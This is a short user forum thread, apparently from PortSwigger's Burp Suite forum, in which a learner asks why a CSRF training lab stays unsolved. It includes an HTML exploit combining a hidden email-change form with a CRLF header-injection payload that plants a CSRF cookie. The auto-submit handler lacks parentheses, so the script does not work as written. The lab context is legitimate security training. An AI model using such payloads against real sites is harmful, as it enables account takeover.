The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

CSRF lab_ CSRF token attached to a non-session cookie

Ankit | Last updated: Aug 01, 2021 04:12AM UTC

Hi, I have created the html script and it is successfully delivered as well; I can see the email ID gets changed when I check the exploit; still the lab remains unsolved. There is no error displayed whatsoever and I have cross-checked with community solutions as well. My script is similar to the solutions. Cannot understand why still the lab doesn't get solved. PFB the script: <html> <body> <form action="https://<my url here> /my-account/change-email" method="POST"> <input type="hidden" name="email" value="wiener@evil-user.net" /> <input type="hidden" name="csrf" value="wiener csrf" /> <input type="submit" value="submit request" /> </form> <img src="https://<my url here>?search=portswigger%0d%0aSet-Cookie:%20csrfKey=wiener a/c csrf key" onerror="document.forms[0].submit;" /> </body> </html>

Michelle, PortSwigger Agent | Last updated: Aug 02, 2021 12:08PM UTC